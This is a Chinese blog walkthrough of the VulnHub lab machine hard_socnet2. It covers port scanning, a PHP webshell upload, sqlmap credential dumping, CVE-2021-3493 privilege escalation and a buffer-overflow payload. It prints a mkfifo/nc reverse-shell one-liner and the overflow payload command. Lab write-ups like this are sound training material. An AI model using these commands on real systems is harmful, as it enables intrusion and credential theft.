hard_socnet2靶机之SQL注入、文件上传利用、CVE-2021-3493、缓冲区溢出、逆向工程

已于 2023-05-12 09:51:14 修改
阅读量508 收藏 4
点赞数
文章标签: 安全 php web安全
于 2023-05-12 09:49:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40898302/article/details/130635461
版权

靶机地址: https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

难度等级: 高

打靶目标: 取得 root 权限

参考链接:

xmlrpc --- XMLRPC 服务端与客户端模块 — Python 3.11.3 文档

涉及攻击方法:

主机发现

端口扫描

SQL注入

文件上传

CVE-2021-3493

XMLRPC

逆向工程

动态调试

缓冲区溢出

漏洞利用代码编写

一、主机发现

扫面本地所有IP

arp-scan -l

二、端口扫描

nmap -p22,80,8000 -sV 172.20.10.4

端口访问

不支持GET方法

用burp suit更改请求方法

首先使用OPTIONS方法,依旧不支持;POST、PUT、DELETE等均不支持。

无果。

访问80端口

发现有注册页面,进行注册

密码:123456

三、文件上传

后台发现上传头像功能,上传shell.php,连接成功

www-data权限

四、SQL注入

发现网站存在sql注入

POST注入

sqlmap -r 1.txt -p query

-r 指定请求包

-p 指定参数

查看数据库名

sqlmap -r 1.txt -p query --dbs

查看表名

sqlmap -r 1.txt -p query -D socialnetwork --tables

查看列和字段

sqlmap -r 1.txt -p query -D socialnetwork -T users --columns

获取具体字段相关信息

sqlmap -r 1.txt -p query -D socialnetwork -T users -C user_password,user_email --dump

需要用sqlmap的字典进行暴力破解用户名密码

通过sql注入获取的账号密码登录管理员后台

五、CVE-2021-3493

通过蚁剑尝试提权

1、查看内核版本

lsb_release -a

利用CVE-2021-3493内核漏洞提权

将exp利用蚁剑上传至目标服务器的当前目录

对exp进行编译

gcc -o exp exploit.c

给exp赋予执行权限

chmod +x exp

执行exp

利用nc之mkfifo反弹shell提权

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.20.10.5 3333 >/tmp/f

shell升级之交互式shell

python -c "import pty; pty.spawn('/bin/bash')"

再次执行exp

此靶机为2020年发出,此提权exp为2021的exp

按照2020年的思路再次提权

查看用户

进入socnet用户家目录

查看文件

发现monitor.py文件(在web已知此文件正在运行)

查看进程发现已经运行

ps aux | grep monitor.py

查看源码

六、缓冲区溢出

gdb对程序进行调试

系统主程序执行vuln(vuln函数有漏洞)函数,vuln加载backdoor函数,backdoor调用系统suid和system

gdb -q .\程序名                                         启动程序

r                                                                让程序run起来

pattern create 100                                    生成100个特殊字符

pattern search                                          查询偏移的字符 #(偏移到EIP)

disas main                                                加载系统的主程序 #@plt 内建函数

break 0*0x08048676                                下断点

del 1                                                          删除第一个断点

s                                                                向下执行,每次只执行一个

info func                                                    查看函数信息

disas                                                         函数名 查看某个函数的信息

                                                                #数据在CUP是倒着存储的

python -c "import struct; print('aa\n1\n1\n1\n' + 'A'*62 + struct.pack('I', 0x08048676))" > payload                                                    #生成payload

#在对方服务器生成paylaod,0x08048676是backdoor的起始编号

gdb -q .\程序名                                         启动程序

r < payload                                               让程序运行payload

cat payload - | ./add_record                      让paylaod内容给add_record运行

白冷
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3541
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
Hard_socnet2(逆向调试提权)
weixin_46591320的博客
12-02 367
逆向提权
Vulnhub-Hard_socnet2
qq_52579508的博客
06-28 603
python 2.7 版本,介绍了 BaseHTTPServer 这个库的使用方法。这个库是 python 自带的标准库的一部分,不需要额外安装,在 linux 系统下,位置在 /usr/lib/python2.7/BaseHTTPServer.py。
hard_socnet2靶场渗透测试
qq_41567985的博客
11-07 172
①先进行简单测试:通过脚本请求了服务端的cpu信息,服务端接受到cpu请求后,通过其API接口执行了客户端的请求,查询到了目标服务器CPU的信息。关于汇编代码简单的说,一个程序在执行中,CPU会给其分配很多内存地址,内存地址中携带了很多指令,程序的处理等,最后再将运算结果输出。直接输入id就能发现我们进入了一个交互式的shell,并且我们的id是0,root权限,到此就成功提权了。从这个add程序的运行来看也不列外,当我在运行这条程序时,首先弹出了欢迎页面,然后在弹出了一些指定的提示。
VulnHub靶机-Hard_Socnet2 |红队打靶03
qq_47289634的博客
07-21 432
发现引入了SimpleXMLRPCServer这个模块,并且这个服务开放在8000端口,这也就解释了前面为什么8000端口,用平常的http请求方法访问不了。当来到home下,发现有socnet用户,进去发现ls -la发现一个拥有suid和guid权限的文件,add_record,且是个可执行的文件。22跑的是OpenSSH的服务,80端口是apache的http服务,8000端口是python运行的一个BaseHTTPServer;访问80端口,是一个登录框,可以注册用户,注册进去看一下。
socnet-backend
03-19
" socnet-backend "项目是一个基于JavaScript技术构建的后端网络应用程序。这个项目的核心目标是创建一个社交网络平台的后端基础设施,它负责处理用户交互、数据存储和通信等功能。JavaScript作为主要编程语言,通常...
SocNetV-3.0.4-7751bace-windows-installer.zip
01-18
Social Network Visualizer (SocNetV) is a cross-platform, user-friendly free software application for social network analysis and visualization. With SocNetV you can: Draw social networks with a few ...
SocNet:OOPT项目3
07-21
【标题】"SocNet:OOPT项目3" 指的是一个关于社交网络的开源项目,该项目可能是OOPT(Object-Oriented Programming Techniques)课程的第三部分实践内容。在这个项目中,开发者可能会学习和应用Java编程语言来构建...
Group17:社交媒体应用
05-20
第17组-SocNet 带有SocNet临时名称和徽标的Social Networking App 分工 David:主页Fernando:注册/登录 技术领域 我们的团队在Bootstrap和一点CSS中使用了HTML 注册说明 注册页面包含一个主要的div元素和一个表单...
40个神奇国外开放源码WordPress插件设计
08-15
插件之一是可湿性粉剂花哨的消息框,允许你快速的包括各种信息在你的模板或页面内容。它可以包括通过简码 [wpfmb] [wpfmb]。也有一些选项,您可以设置标签上的更新设计。 另一个插件是简单的转换器,它是一个奇怪的...
hard_socnet2靶机打靶过程及思路
qq_52610024的博客
04-16 2177
mkfifo/tmp/f;以及sysytem函数,backdoor函数,继续disasvuln查看vuln函数的汇编代码,发现里面使用了strcpy。函数,可能存在缓冲区溢出的一个c语言函数,disasbackdoor查看汇编代码,发现使用了一个setuid函数。一个内建函数,是一个自定义函数,infofunction查看当前应用程序的使用函数信息,发现setuid函数。内建函数,break*地址,添加断点,命令s单步执行,继续观察,观察到vuln-弱点,这个单词,发现不是。...
CVE-2021-3493(提权内核漏洞)
墨痕诉清风的博客
06-07 2230
CVE-2021-3493漏洞是Linux内核中overlayfs文件系统中的Ubuntu特定问题,在Ubuntu中没有正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu带有一个支持非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来进行提权操作,因此该漏洞对Linux的其他发行版没有影响。Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM (Linux内核版本 < 5.
kali之vulnhub,hardsocnet2
weixin_54431413的博客
05-15 998
一、利用最近公布的ubuntu 8.4 内核提权漏洞来进行了提取,简便的得到了服务器root权限。 二、利用缓冲区溢出来执行admin留下的backdoor来获得root权限,涉及gdb调试,汇编语言等
sqli-labs关卡7(结合文件上传漏洞+一句马+菜刀)通关思路
zyh1588的博客
10-28 1154
小白对sqli-labs第七关的理解
hard_socnet2靶机渗透测试
最新发布
weixin_58786230的博客
07-12 118
【代码】hard_socnet2靶机渗透测试。
CTF-web 文件上传SQL注入,XSS漏洞学习笔记
abtgu的博客
03-14 2021
文章目录CTF-WEB文件上传1. 前端校验2. Content-Type校验3. 黑名单 过滤绕过4. 特殊文件5. 漏洞解析6. %00(url编码) 和 0x00 (16进制)截断SQL注入1. 典型攻击手段:2. 出题人套路:XSS漏洞1. 反射型2. dom型3. 存储型3. 存储型 CTF-WEB 文件上传 1. 前端校验 校验方法:JavaScript判断后缀,类型等 绕过:Bur...
【Vulnhub靶场】通过sql注入漏洞,文件上传漏洞拿下网站webshell
weixin_45619494的博客
10-12 672
00 页面没变化?发现上传的路径没法知道,用7kbscan扫描,发现http://192.168.93.132/admin/uploads,进入。点击test,发现多了个图片,上面url变成http://192.168.93.132/cat.php?返回首页,检查源代码,发现图片的变化是通过id的变化来改变的。
hard_socnet靶机(vulnhub)
wcl20010的博客
05-03 1301
这个靶机的难度很高。慢慢摸索,接触新知识。 https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova 靶场链接:链接:https://pan.baidu.com/s/1HaAn_3cF-vFCgnoQ1IC75Q 提取码:ifat 1.主机发现 arp-scan -l 2.端口扫描 3.漏洞利用 显示的是不支持GET请求,那就去抓包用 ...
简单SQL注入实验之web,靶场搭建在phpstudy,连接mysql数据库;里面有很多靶场,今天就只是玩一玩sql;
xiaochenhang的博客
08-17 344
columns表:table_schema:存储了所有的数据库名字,table_name:存储了所有的表 column_name 存储了所有的字段名字;7、通过为真语句判断后正常,为假语句异常,可能存在整型注入,直接使用数字型(整型)注入看一看;tables表:table_schema:存储了所有数据库名字,table_name:存储了所有的表名字。8、判断好字段数为6后,利用union判断回显字段,若无回显,接下来则不能在浏览器显示查询;4、搭建好后,有一个警告,不用管它。......
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值